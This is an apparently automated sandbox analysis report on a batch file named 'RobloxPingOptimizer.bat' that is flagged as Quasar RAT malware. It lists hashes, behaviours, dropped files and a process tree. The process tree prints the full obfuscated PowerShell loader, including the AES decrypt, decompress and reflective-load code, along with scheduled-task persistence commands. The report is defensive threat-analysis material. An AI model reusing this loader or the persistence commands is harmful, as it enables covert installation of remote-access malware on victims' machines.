Analysis
-
max time kernel
15s -
max time network
19s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
02-06-2024 21:14
Static task
static1
Behavioral task
behavioral1
Sample
RobloxPingOptimizer.bat
Resource
win7-20240221-en
General
-
Target
RobloxPingOptimizer.bat
-
Size
273KB
-
MD5
0d3e0553b13ae24b0e765dc71b71d157
-
SHA1
2e7ea67463d79b9047aa843210667ac11da4650d
-
SHA256
3d532f4155981fbaf60ddbaf14851a4b12d1066cbd182144ad0bdcd0b0f379a6
-
SHA512
43b0250496746f8c161d3009f0842d2758eb80196ce7bc5e4f05a1ac552ae86ebece4fcb42a6b4f52be7981e01782817c56d12017d70c77e34327f63433a5da0
-
SSDEEP
6144:ymjeUWzu9cgBXKz1IQDKHkaIFH4zfWHF0QR1rh3Og2q4E:yseUWq9cgBazioKkaIEfOFtR1rh3Z2S
Malware Config
Extracted
quasar
-
reconnect_delay
3000
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4372-82-0x0000000007C90000-0x0000000007CEE000-memory.dmp family_quasar -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 29 4372 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 992 powershell.exe 4372 powershell.exe 3752 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
Processes:
Runtime Broker.exepid process 1864 Runtime Broker.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 28 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exepowershell.exepowershell.exeRuntime Broker.exepid process 3752 powershell.exe 3752 powershell.exe 992 powershell.exe 992 powershell.exe 4372 powershell.exe 4372 powershell.exe 4372 powershell.exe 1864 Runtime Broker.exe 1864 Runtime Broker.exe 1864 Runtime Broker.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3752 powershell.exe Token: SeDebugPrivilege 992 powershell.exe Token: SeIncreaseQuotaPrivilege 992 powershell.exe Token: SeSecurityPrivilege 992 powershell.exe Token: SeTakeOwnershipPrivilege 992 powershell.exe Token: SeLoadDriverPrivilege 992 powershell.exe Token: SeSystemProfilePrivilege 992 powershell.exe Token: SeSystemtimePrivilege 992 powershell.exe Token: SeProfSingleProcessPrivilege 992 powershell.exe Token: SeIncBasePriorityPrivilege 992 powershell.exe Token: SeCreatePagefilePrivilege 992 powershell.exe Token: SeBackupPrivilege 992 powershell.exe Token: SeRestorePrivilege 992 powershell.exe Token: SeShutdownPrivilege 992 powershell.exe Token: SeDebugPrivilege 992 powershell.exe Token: SeSystemEnvironmentPrivilege 992 powershell.exe Token: SeRemoteShutdownPrivilege 992 powershell.exe Token: SeUndockPrivilege 992 powershell.exe Token: SeManageVolumePrivilege 992 powershell.exe Token: 33 992 powershell.exe Token: 34 992 powershell.exe Token: 35 992 powershell.exe Token: 36 992 powershell.exe Token: SeIncreaseQuotaPrivilege 992 powershell.exe Token: SeSecurityPrivilege 992 powershell.exe Token: SeTakeOwnershipPrivilege 992 powershell.exe Token: SeLoadDriverPrivilege 992 powershell.exe Token: SeSystemProfilePrivilege 992 powershell.exe Token: SeSystemtimePrivilege 992 powershell.exe Token: SeProfSingleProcessPrivilege 992 powershell.exe Token: SeIncBasePriorityPrivilege 992 powershell.exe Token: SeCreatePagefilePrivilege 992 powershell.exe Token: SeBackupPrivilege 992 powershell.exe Token: SeRestorePrivilege 992 powershell.exe Token: SeShutdownPrivilege 992 powershell.exe Token: SeDebugPrivilege 992 powershell.exe Token: SeSystemEnvironmentPrivilege 992 powershell.exe Token: SeRemoteShutdownPrivilege 992 powershell.exe Token: SeUndockPrivilege 992 powershell.exe Token: SeManageVolumePrivilege 992 powershell.exe Token: 33 992 powershell.exe Token: 34 992 powershell.exe Token: 35 992 powershell.exe Token: 36 992 powershell.exe Token: SeIncreaseQuotaPrivilege 992 powershell.exe Token: SeSecurityPrivilege 992 powershell.exe Token: SeTakeOwnershipPrivilege 992 powershell.exe Token: SeLoadDriverPrivilege 992 powershell.exe Token: SeSystemProfilePrivilege 992 powershell.exe Token: SeSystemtimePrivilege 992 powershell.exe Token: SeProfSingleProcessPrivilege 992 powershell.exe Token: SeIncBasePriorityPrivilege 992 powershell.exe Token: SeCreatePagefilePrivilege 992 powershell.exe Token: SeBackupPrivilege 992 powershell.exe Token: SeRestorePrivilege 992 powershell.exe Token: SeShutdownPrivilege 992 powershell.exe Token: SeDebugPrivilege 992 powershell.exe Token: SeSystemEnvironmentPrivilege 992 powershell.exe Token: SeRemoteShutdownPrivilege 992 powershell.exe Token: SeUndockPrivilege 992 powershell.exe Token: SeManageVolumePrivilege 992 powershell.exe Token: 33 992 powershell.exe Token: 34 992 powershell.exe Token: 35 992 powershell.exe -
Suspicious use of WriteProcessMemory 26 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exedescription pid process target process PID 3552 wrote to memory of 1612 3552 cmd.exe cmd.exe PID 3552 wrote to memory of 1612 3552 cmd.exe cmd.exe PID 3552 wrote to memory of 3752 3552 cmd.exe powershell.exe PID 3552 wrote to memory of 3752 3552 cmd.exe powershell.exe PID 3552 wrote to memory of 3752 3552 cmd.exe powershell.exe PID 3752 wrote to memory of 992 3752 powershell.exe powershell.exe PID 3752 wrote to memory of 992 3752 powershell.exe powershell.exe PID 3752 wrote to memory of 992 3752 powershell.exe powershell.exe PID 3752 wrote to memory of 1820 3752 powershell.exe WScript.exe PID 3752 wrote to memory of 1820 3752 powershell.exe WScript.exe PID 3752 wrote to memory of 1820 3752 powershell.exe WScript.exe PID 1820 wrote to memory of 2272 1820 WScript.exe cmd.exe PID 1820 wrote to memory of 2272 1820 WScript.exe cmd.exe PID 1820 wrote to memory of 2272 1820 WScript.exe cmd.exe PID 2272 wrote to memory of 3740 2272 cmd.exe cmd.exe PID 2272 wrote to memory of 3740 2272 cmd.exe cmd.exe PID 2272 wrote to memory of 3740 2272 cmd.exe cmd.exe PID 2272 wrote to memory of 4372 2272 cmd.exe powershell.exe PID 2272 wrote to memory of 4372 2272 cmd.exe powershell.exe PID 2272 wrote to memory of 4372 2272 cmd.exe powershell.exe PID 4372 wrote to memory of 4144 4372 powershell.exe schtasks.exe PID 4372 wrote to memory of 4144 4372 powershell.exe schtasks.exe PID 4372 wrote to memory of 4144 4372 powershell.exe schtasks.exe PID 4372 wrote to memory of 1864 4372 powershell.exe Runtime Broker.exe PID 4372 wrote to memory of 1864 4372 powershell.exe Runtime Broker.exe PID 4372 wrote to memory of 1864 4372 powershell.exe Runtime Broker.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\RobloxPingOptimizer.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3552 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1wL4kmOdB2R3iGa/mEDXbQunvSUVKGrVuRrft2dp9pw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BFwaf2FXZug80opDTZLBSA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HKEwQ=New-Object System.IO.MemoryStream(,$param_var); $kVcOJ=New-Object System.IO.MemoryStream; $eLOZz=New-Object System.IO.Compression.GZipStream($HKEwQ, [IO.Compression.CompressionMode]::Decompress); $eLOZz.CopyTo($kVcOJ); $eLOZz.Dispose(); $HKEwQ.Dispose(); $kVcOJ.Dispose(); $kVcOJ.ToArray();}function execute_function($param_var,$param2_var){ $YpwEB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XnPgt=$YpwEB.EntryPoint; $XnPgt.Invoke($null, $param2_var);}$tHcqT = 'C:\Users\Admin\AppData\Local\Temp\RobloxPingOptimizer.bat';$host.UI.RawUI.WindowTitle = $tHcqT;$AjwOC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tHcqT).Split([Environment]::NewLine);foreach ($vriJL in $AjwOC) { if ($vriJL.StartsWith('jwbKUUEoLPvvJlZYWdJd')) { $srAUX=$vriJL.Substring(20); break; }}$payloads_var=[string[]]$srAUX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:1612
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3752 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_722_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_722.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:992 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_722.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_722.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1wL4kmOdB2R3iGa/mEDXbQunvSUVKGrVuRrft2dp9pw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BFwaf2FXZug80opDTZLBSA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HKEwQ=New-Object System.IO.MemoryStream(,$param_var); $kVcOJ=New-Object System.IO.MemoryStream; $eLOZz=New-Object System.IO.Compression.GZipStream($HKEwQ, [IO.Compression.CompressionMode]::Decompress); $eLOZz.CopyTo($kVcOJ); $eLOZz.Dispose(); $HKEwQ.Dispose(); $kVcOJ.Dispose(); $kVcOJ.ToArray();}function execute_function($param_var,$param2_var){ $YpwEB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XnPgt=$YpwEB.EntryPoint; $XnPgt.Invoke($null, $param2_var);}$tHcqT = 'C:\Users\Admin\AppData\Roaming\Windows_Log_722.bat';$host.UI.RawUI.WindowTitle = $tHcqT;$AjwOC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tHcqT).Split([Environment]::NewLine);foreach ($vriJL in $AjwOC) { if ($vriJL.StartsWith('jwbKUUEoLPvvJlZYWdJd')) { $srAUX=$vriJL.Substring(20); break; }}$payloads_var=[string[]]$srAUX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "5⤵PID:3740
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4372 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
PID:4144 -
C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe"C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1864
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD59751fcb3d8dc82d33d50eebe53abe314
SHA17a680212700a5d9f3ca67c81e0e243834387c20c
SHA256ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7
SHA51254907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
21KB
MD5e8a1d2e37447361e22c1f26afc1ef1e5
SHA19394f7a0261d827e62bd85c77e744a8d8a163044
SHA2563ad7a86296cbe43ab0d5754ea322d11993b6bb6e472e6d2d8413f07c5a81868b
SHA51228c2ed3384ad00abaf87e566ac6e86200f20a086bd35456725c0e88a11f0744ffb53786b5c76e5b0c88e11053fde3b100549fb8e29992e30f071023eeec72119
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
20KB
MD5b5664741c1c232dfa802c70016a0c0bb
SHA1aaafd2f550c416eb9a6c776dd686acc001f9793c
SHA25657bda5552ea8968f9a1c233b74522f31309465c5ccd75e813ae4bfefad965bc3
SHA5127ae81c215b9a909f95e2a2b980f660a9cc47249f11faa82e097b3ec6c48c1399babec6d8f41c40669edd02062d45385a774e9e1a48284cb1ff39f86f70f188ca
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dntvsgkp.oym.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exeFilesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
C:\Users\Admin\AppData\Roaming\Windows_Log_722.batFilesize
273KB
MD50d3e0553b13ae24b0e765dc71b71d157
SHA12e7ea67463d79b9047aa843210667ac11da4650d
SHA2563d532f4155981fbaf60ddbaf14851a4b12d1066cbd182144ad0bdcd0b0f379a6
SHA51243b0250496746f8c161d3009f0842d2758eb80196ce7bc5e4f05a1ac552ae86ebece4fcb42a6b4f52be7981e01782817c56d12017d70c77e34327f63433a5da0
-
C:\Users\Admin\AppData\Roaming\Windows_Log_722.vbsFilesize
115B
MD5244cdde6c7d05c2a5ad6e42f08db4083
SHA124a4d536db3aa4e1dfd53d6118edfbf46ce63658
SHA256f9d05f1838acf8a8376e7e3a608dc90956360d505cd0966ca3d4d6b62c93ca9f
SHA51245fd1a8dfaaf13df79b2c4be69dc8dfeb6e27541d4774afb651d9314f3bcbd14d3f94eb66bce2c5a175a1f90e877c49d2732de8c826bc7e0f9cf5214b390ef09
-
memory/992-62-0x0000000074AD0000-0x0000000075280000-memory.dmpFilesize
7.7MB
-
memory/992-41-0x0000000070870000-0x00000000708BC000-memory.dmpFilesize
304KB
-
memory/992-59-0x0000000074AD0000-0x0000000075280000-memory.dmpFilesize
7.7MB
-
memory/992-58-0x00000000076D0000-0x00000000076E1000-memory.dmpFilesize
68KB
-
memory/992-57-0x0000000007760000-0x00000000077F6000-memory.dmpFilesize
600KB
-
memory/992-56-0x0000000007540000-0x000000000754A000-memory.dmpFilesize
40KB
-
memory/992-55-0x0000000074AD0000-0x0000000075280000-memory.dmpFilesize
7.7MB
-
memory/992-54-0x00000000073A0000-0x0000000007443000-memory.dmpFilesize
652KB
-
memory/992-53-0x0000000007340000-0x000000000735E000-memory.dmpFilesize
120KB
-
memory/992-52-0x0000000074AD0000-0x0000000075280000-memory.dmpFilesize
7.7MB
-
memory/992-51-0x0000000074AD0000-0x0000000075280000-memory.dmpFilesize
7.7MB
-
memory/992-40-0x0000000007360000-0x0000000007392000-memory.dmpFilesize
200KB
-
memory/992-28-0x0000000074AD0000-0x0000000075280000-memory.dmpFilesize
7.7MB
-
memory/992-29-0x0000000074AD0000-0x0000000075280000-memory.dmpFilesize
7.7MB
-
memory/992-30-0x0000000074AD0000-0x0000000075280000-memory.dmpFilesize
7.7MB
-
memory/3752-25-0x0000000007A10000-0x0000000007A46000-memory.dmpFilesize
216KB
-
memory/3752-0-0x0000000074ADE000-0x0000000074ADF000-memory.dmpFilesize
4KB
-
memory/3752-16-0x0000000006060000-0x00000000060C6000-memory.dmpFilesize
408KB
-
memory/3752-24-0x00000000079F0000-0x00000000079F8000-memory.dmpFilesize
32KB
-
memory/3752-23-0x00000000078D0000-0x00000000078EA000-memory.dmpFilesize
104KB
-
memory/3752-22-0x0000000007F30000-0x00000000085AA000-memory.dmpFilesize
6.5MB
-
memory/3752-21-0x0000000007830000-0x00000000078A6000-memory.dmpFilesize
472KB
-
memory/3752-20-0x0000000006AB0000-0x0000000006AF4000-memory.dmpFilesize
272KB
-
memory/3752-19-0x0000000006590000-0x00000000065DC000-memory.dmpFilesize
304KB
-
memory/3752-18-0x0000000006550000-0x000000000656E000-memory.dmpFilesize
120KB
-
memory/3752-17-0x00000000060D0000-0x0000000006424000-memory.dmpFilesize
3.3MB
-
memory/3752-26-0x0000000008B60000-0x0000000009104000-memory.dmpFilesize
5.6MB
-
memory/3752-11-0x0000000005F80000-0x0000000005FE6000-memory.dmpFilesize
408KB
-
memory/3752-5-0x0000000005EE0000-0x0000000005F02000-memory.dmpFilesize
136KB
-
memory/3752-4-0x0000000074AD0000-0x0000000075280000-memory.dmpFilesize
7.7MB
-
memory/3752-3-0x00000000057E0000-0x0000000005E08000-memory.dmpFilesize
6.2MB
-
memory/3752-80-0x0000000074AD0000-0x0000000075280000-memory.dmpFilesize
7.7MB
-
memory/3752-1-0x00000000050A0000-0x00000000050D6000-memory.dmpFilesize
216KB
-
memory/3752-2-0x0000000074AD0000-0x0000000075280000-memory.dmpFilesize
7.7MB
-
memory/4372-83-0x0000000007D90000-0x0000000007E22000-memory.dmpFilesize
584KB
-
memory/4372-84-0x0000000007EB0000-0x0000000007EC2000-memory.dmpFilesize
72KB
-
memory/4372-85-0x0000000008010000-0x000000000804C000-memory.dmpFilesize
240KB
-
memory/4372-82-0x0000000007C90000-0x0000000007CEE000-memory.dmpFilesize
376KB
-
memory/4372-81-0x00000000062C0000-0x00000000062F6000-memory.dmpFilesize
216KB